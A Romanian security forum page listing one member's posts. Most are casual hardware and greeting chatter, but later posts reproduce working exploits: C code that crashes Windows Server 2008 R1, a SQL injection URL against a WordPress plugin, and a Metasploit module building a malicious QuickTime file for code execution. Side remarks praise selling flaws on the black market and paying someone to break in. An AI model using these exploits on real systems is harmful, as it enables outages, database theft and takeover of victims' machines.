Jump to content

LLegoLLaS

Active Members
  • Posts

    2060
  • Joined

  • Last visited

  • Days Won

    11

Everything posted by LLegoLLaS

  1. ai si boxe portabile gen X-Mini V2?
  2. @sanda da dar tre sa fie foarte pura sa arate ca in video (sticlele alea nu is aruncate, is sticle noi,sa nu fie zgaraiate )
  3. pai desfa=l si clarifica n-am inteels nimic din ce ai scris.Banuiesti cxa e doar unu ocupat sau stii sigur?(de obicei producatorii de laptopuri pun ramul in dual channel [1gb=2x512,2gb=2x1gb] si tot asa) Si CHiar daca e doar unu ocupat te sfatuiesc sa faci tot ce am spus sa nu ai probleme dupa Pe viitor o sa fie si mai scumpe ddr2 .
  4. Problema e ca tu ai doar 2 sloturi(cel mai probabil)...ia-ti 2 bucati din linku care l-ai dat si gata.alea care le ai acum le vinzi
  5. Iti iei AIDA64 de pe torrente si vezi exact tipul de ram existent.Preferabil sa iei inca unul identic sa nu ai probleme cu bsod si alte incompatibilitati (asta daca mai ai slot liber si pastrezi si placuta actuala)
  6. Trimiti unj porumbel mesager lu' Nemessis
  7. LLegoLLaS

    istealer

    il pui pe cd si umbli cu el in buzunar
  8. Din ce stiu nu poti.Nu mi-a mers niciodata pe java (si da c3 nu are symbian).Pe s60v3 merge brici in schimb. cauta pe ovi store
  9. LLegoLLaS

    bug bounty

    @Nytro daca ramane cuminte n-are de ce dar altfel
  10. LLegoLLaS

    bug bounty

    Felicitari?Nu-s in masura eu.Aveai si posibilitatea exploatarii si vanzarii pe black market.Daca puneai ideea la punct (poate ai pus-o dar pur si simplu nu ai vrut sa faci rau) puteai castiga mult mai multi bani. Cine o vede ca pe o lauda de sine e putin dus
  11. platesti pe cineva si ti-l ''sparge''
  12. LLegoLLaS

    Ma retrag!

    Bafta in continuare!
  13. LLegoLLaS

    salut

    Bine ai venit.Detaliaza putin la ce te pricepi mai exact
  14. l-am vazut la tv da-l in plm a dat cu mouseu de a ramas atarnat prin studio (bine-ar fisa-i cada in cap deseara))) a mai dat o ''karata'' si laptopului saracu' penal omu
  15. Bun venit!In sfarsit un om ce pare serios
  16. Hi all. Here's a cute little local DoS attack against Windows Server 2008 R1, which will allow any user who can execute unprivileged code to BSoD your server with about three lines of C. I have reported this to Microsoft, but because of the limited scope of the issue - DoS-only, and server 2008 R1, as opposed to R2 - they declined to put out a security bulletin. Note that, as far as I can tell, upgrades from R1 to R2 are for-pay unless you bought R1 with Software Assurance originally, and additionally, that R2 does not support 32-bit hardware. I originally informed the vendor ten months ago, and their response was that, due to the DoS-only and R1-only circumstance, this problem "would be a candidate for inclusion in a future service pack update should one be released on the affected platforms". Perhaps naively, I then expected this to be fixed via a service pack, which has not transpired since then. Since the issue is so straightforward to reproduce (I refuse to believe that no-one else has found this), I have decided to disclose the issue publically in order to assist and remaining owners of 2008 R1 in securing their boxes. The best way to explain the issue is with an example exploit: int main(int argc, char *argv[]) { DWORD foo; char stuff[10]; CloseHandle(GetStdHandle(STD_OUTPUT_HANDLE )); CloseHandle(GetStdHandle(STD_ERROR_HANDLE )); ReadConsole(GetStdHandle( STD_INPUT_HANDLE ), stuff, 5, &foo, NULL); } Kapow - it's that simple. Close stdout and stderr, and read from stdin. Any of the other functions which do this can be used (cygwin, for example, can be used with it's standard C calls which eventually call CloseHandle). Anyway, if you run that on a server 2008 R1 box you will bluescreen! Further investigaion reveals a null deref in CSRSS: *** An Access Violation occurred in C:\Windows\system32\csrss.exe .. The instruction at 756DB6A1 tried to write to an invalid address, 0000000C eax=015c0da8 ebx=00000000 ecx=00000000 edx=015c14a8 esi=00000000 edi=015c0dc8 eip=756db6a1 esp=0083f5d0 ebp=0083f6a0 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 WARNING: Process directory table base 1F187040 doesn't match CR3 1F187360 001b:756db6a1 ff460c inc dword ptr [esi+0Ch] ds:0023:0000000c=???????? 756db6a1 ff460c inc dword ptr [esi+0Ch] 756db6a4 8b8d54ffffff mov ecx,dword ptr [ebp-0ACh] 756db6aa 898570ffffff mov dword ptr [ebp-90h],eax 756db6b0 8a8059010000 mov al,byte ptr [eax+159h] 756db6b6 8845b3 mov byte ptr [ebp-4Dh],al 756db6b9 8a471c mov al,byte ptr [edi+1Ch] 756db6bc 66834da4ff or word ptr [ebp-5Ch],0FFFFh 756db6c1 66834da6ff or word ptr [ebp-5Ah],0FFFFh ChildEBP RetAddr Args to Child 0083f6a0 756dbd5e 015c0dc8 015c0da8 002a0058 winsrv!ReadChars+0x3c2 0083f6f8 757359e4 015c0da8 0083f80c 945f0621 winsrv!SrvReadConsole+0x102 0083f86c 76f77ca3 00000000 7781fc7b 00000000 CSRSRV!CsrApiRequestThread+0x3b1 0083f8ac 76f9e489 75735633 00000000 ffffffff ntdll!__RtlUserThreadStart+0x35 0083f8c4 00000000 75735633 00000000 00000000 ntdll!_RtlUserThreadStart+0x1b Sample bugcheck output: *** STOP: 0x000000F4 (0x00000003, 0x84B92020, 0x84B9216C, 0x81C71A60) Confirmed vulnerable: * Windows server 2008 r1 Confirmed not vulnerable (some by MS, some by me): * Server 2008 r2 * Windows 7 * XP, 2003, 2003 r2 * Pretty much all the other MS OS's. Mitigation: I have no idea. If your environment allows it, do not enable users to run any user-supplied code (although if that's possible, then you've probably already taken steps to prevent this). Alternatively, upgrade to R2 (or, indeed, anything other that 2008 R1) if possible. If you are annoyed that this circumstance requires an upgrade, shout at MS. Microsoft supplied the following when asked if they were aware of any mitigations: "An attacker must have valid logon credentials and be able to log on locally to exploit this vulnerability. The vulnerability could not be exploited remotely or by anonymous users." sursa: Windows Server 2008 R1 Local Denial of Service - BugSearch.net
  17. # Exploit Title: WordPress Facebook Opengraph Meta Plugin plugin <= 1.0 SQL Injection Vulnerability # Date: 2011-09-03 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/facebook-opengraph-meta-plugin.zip # Version: 1.0 (tested) # Note: magic_quotes has to be turned off --- PoC --- http://www.site.com/wp-content/plugins/facebook-opengraph-meta-plugin/all_meta.php?pst_title=1') UNION ALL SELECT CONCAT_WS(CHAR(44),version(),current_user(),database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--%20&page=1&rows=1 --------------- Vulnerable code --------------- $page = $_GET['page']; // get the requested page $limit = $_GET['rows']; // get how many rows we want to have into the grid ... if(isset($_REQUEST["pst_title"])) $pst_title = $_REQUEST['pst_title']; ... if($pst_title!=''){ $where.= " AND (wposts.post_title LIKE '%$pst_title%'"; $where.= " OR wpostmeta.meta_value LIKE '%$pst_title%')"; } $result = $wpdb->get_var("SELECT COUNT(*) AS count FROM $wpdb->postmeta WHERE meta_key = '_OgMeta'"); $count = $result['count']; if( $count >0 ) { $total_pages = ceil($count/$limit); } else { $total_pages = 0; } if ($page > $total_pages) $page=$total_pages; $start = $limit*$page - $limit; ... $querystr = " SELECT wposts.* FROM $wpdb->posts wposts, $wpdb->postmeta wpostmeta WHERE wposts.ID = wpostmeta.post_id AND wpostmeta.meta_key = '_OgMeta' AND wposts.post_status = 'publish' AND (wposts.post_type = 'post' OR wposts.post_type = 'page')".$where. "ORDER BY wposts.post_date DESC LIMIT $start , $limit "; $result = $wpdb->get_results($querystr);//, OBJECT);
  18. ## # $Id: apple_quicktime_pnsize.rb 13691 2011-09-03 21:17:58Z mc $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'Apple QuickTime PICT PnSize Buffer Overflow', 'Description' => %q{ This module exploits a vulnerability in Apple QuickTime Player 7.60.92.0. When opening a .mov file containing a specially crafted PnSize value, an attacker may be able to execute arbitrary code. }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], 'Version' => '$Revision: 13691 $', 'References' => [ [ 'CVE', '2011-0257' ], [ 'BID', '49144' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', 'DisablePayloadHandler' => 'true', }, 'Payload' => { 'Space' => 750, 'BadChars' => "", 'EncoderType' => Msf::Encoder::Type::AlphanumUpper, 'DisableNops' => 'True', 'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff", 'EncoderOptions' => { 'BufferRegister' => 'ECX', }, }, 'Platform' => 'win', 'Targets' => [ [ 'Windows XP SP3', { 'Ret' => 0x672b6d4a } ], # QuickTime.qts 7.60.92.0 ], 'Privileged' => false, 'DisclosureDate' => 'Aug 8 2011', 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [ false, 'The file name.', 'msf.mov' ]), ], self.class) end def exploit trigger = rand_text_alpha_upper(3324) trigger[2302, 8] = generate_seh_record(target.ret) trigger[2310, payload.encoded.size] = payload.encoded path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2011-0257.mov" ) fd = File.open(path, "rb" ) sploit = fd.read(fd.stat.size) fd.close sploit << trigger file_create(sploit) end end __END__ http://mirrors.apple2.org.za/apple.cabi.net/Graphics/PICT.and_QT.INFO/PICT.file.format.TI.txt Opcode Name Description Data Size (in bytes) $0007 PnSize pen size (point) 4
×
×
  • Create New...